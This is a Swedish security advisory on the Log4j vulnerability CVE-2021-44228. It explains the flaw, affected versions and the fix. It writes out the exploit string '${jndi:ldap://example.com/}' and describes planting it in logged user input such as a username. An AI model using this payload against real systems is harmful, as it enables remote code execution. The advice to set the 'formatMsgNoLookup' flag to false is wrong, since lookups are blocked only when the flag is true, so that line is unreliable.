In English
log4j sårbarhet

10 december, 2021

Allvarlig sårbarhet i Log4j

En allvarlig sårbarhet som kan leda till icke-autentiserad kodexekvering har publicerats i Log4j (CVE-2021-44228). Attackkod finns publikt på internet och ett flertal stora sajter och applikationer är sårbara. 

Log4j är ett loggningsbibliotek för Java, det vill säga ett bibliotek för att skapa och skriva loggfiler i en Java-applikation. Log4j är ett av de mest använda loggningsbiblioteken och är skrivet och underhålls av Apache Foundation. Biblioteket stöder formatering av strängar med hjälp av måsvingar, där exempelvis “${app.version}” skulle bytas ut mot applikationens versionsnummer i en loggfil. 

Sårbarheten grundar sig i att man kan förmå en applikation att göra en uppslagning mot en server med hjälp av “${jndi:ldap://example.com/}”. Kontrollerar en angripare den servern kan denne returnera en fil som sedan skulle exekveras av applikationen. Detta leder till en kodexekvering i applikationen - något som brukar klassas bland de allvarligaste sårbarheterna en applikation kan ha. 

Ifall en applikation inkluderar icke-validerad data från en användare i en loggfil så är det mycket troligt att applikationen är sårbar. En angripare skulle exempelvis kunna registrera en ny användare med ett namn som innehåller attackkoden, och när applikationen loggar att den användaren loggat in så utnyttjas sårbarheten. 

Samtliga versioner av Log4j (v2.0-2.14.1) är sårbara, fram till 2.15 som innehåller en patch för bristen. Log4j 1.x antas vara sårbar, men den versionen är så pass gammal att den inte underhålls och kommer därmed inte få en säkerhetsuppdatering. 

Rekommendationerna är att omedelbart uppdatera till senaste versionen av Log4j. Från version 2.10 och framåt finns även en konfigurationsflagga (formatMsgNoLookup) som kan sättas till falskt för att blockera de sårbara anropen. 

Mer information

Kontakta oss

Vi erbjuder flera kontaktvägar och återkopplar så snart som möjligt. Har du känslig information ber vi dig att maila krypterat.